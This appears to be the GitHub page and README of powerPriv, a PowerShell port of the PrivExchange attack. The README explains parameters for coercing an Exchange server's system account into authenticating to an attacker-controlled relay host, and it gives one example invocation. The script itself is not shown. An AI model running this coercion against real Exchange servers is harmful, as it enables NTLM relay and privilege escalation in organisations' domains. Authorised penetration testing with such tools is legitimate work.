A Powershell implementation of PrivExchange designed to run under the current user's context
Branch: master
Clone or download
G0ldenGunSec no email check
added an error code if user didn't have a mailbox associated with their account.
Latest commit b5fa8bb Jan 31, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitattributes Initial commit Jan 31, 2019
LICENSE Initial Release Jan 31, 2019
README.md Update README.md Jan 31, 2019
powerPriv.ps1 no email check Jan 31, 2019




A powershell implementation of PrivExchange by @_dirkjan (original code found here: https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py) Useful for environments on which you cannot run python-based applications, have user credentials, or do not want to drop files to disk. Will cause the target exchange server system account to attempt to authenticate to a system of your choice.


Hostname or IP of the target exchange box. Based on DNS config may require FQDN if using hostname. (Required)


Hostname or IP of a system you control, and are ideally running ntlmrelayx on. We are telling the Exchange server to attempt to authenticate to this system. Based on DNS config may require FQDN if using hostname. (Required)


Port to attempt to connect to Exchange server over. Default is 443.


Port Exchange should attempt to connect back to the attacker over. Default is 80


Page we are telling the Exchange server to connect to on our attack system. Slashes are not required. Default is powerPriv.


Set to true if you dont want to use https to connect initially to the Exchange server. Default is false (use https).


Version of Exchange server we're targeting. Default is 2013.


powerPriv -targetHost corpExch01 -attackerHost -Version 2016


Author: @g0ldenGunSec  - Based on the tool created by @_dirkjan
Only use this tool on networks you own or have permission to test against.